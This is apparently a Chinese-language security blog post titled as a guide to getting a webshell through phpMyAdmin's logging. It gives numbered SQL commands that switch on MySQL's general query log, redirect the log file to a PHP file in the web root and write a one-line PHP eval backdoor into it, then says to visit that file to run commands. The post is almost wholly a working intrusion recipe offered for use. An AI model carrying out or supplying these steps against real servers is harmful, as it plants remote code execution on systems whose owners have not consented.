利用 phpMyAdmin 日志报错 getshell.md

本文最后更新于 2025年7月14日 凌晨

🚀 简介

利用 phpMyAdmin 的错误日志功能,可以巧妙地写入一句话木马,实现远程获取 WebShell。

🔥 利用步骤

1
2
3
4
5
6
7
8
9
10
11
12
13
-- 查看当前日志记录状态
show variables like "general_log%";

-- 开启通用查询日志
set global general_log='on';

-- 设置日志文件保存路径为网站根目录下的一个 PHP 文件(注意路径根据实际环境调整)
set global general_log_file ="D:\\phpStudy\\PHPTutorial\\WWW\\ant.php";

-- 通过执行SQL写入一句话木马(替换为你想要的 WebShell 代码)
select "<?php @eval(\$_POST['cmd']); ?>";

-- 访问:http://你的服务器地址/ant.php 即可执行 WebShell

⚠️ 注意事项

  • 路径设置必须是 Web 服务器可访问的目录,否则无法访问到生成的木马文件。
  • 该操作需要数据库有足够权限修改日志配置。
  • 使用后请及时关闭日志功能,避免服务器性能下降或信息泄露。
1
set global general_log='off';

📷 演示截图

查看日志配置

开启日志写入木马

执行注入

访问Shell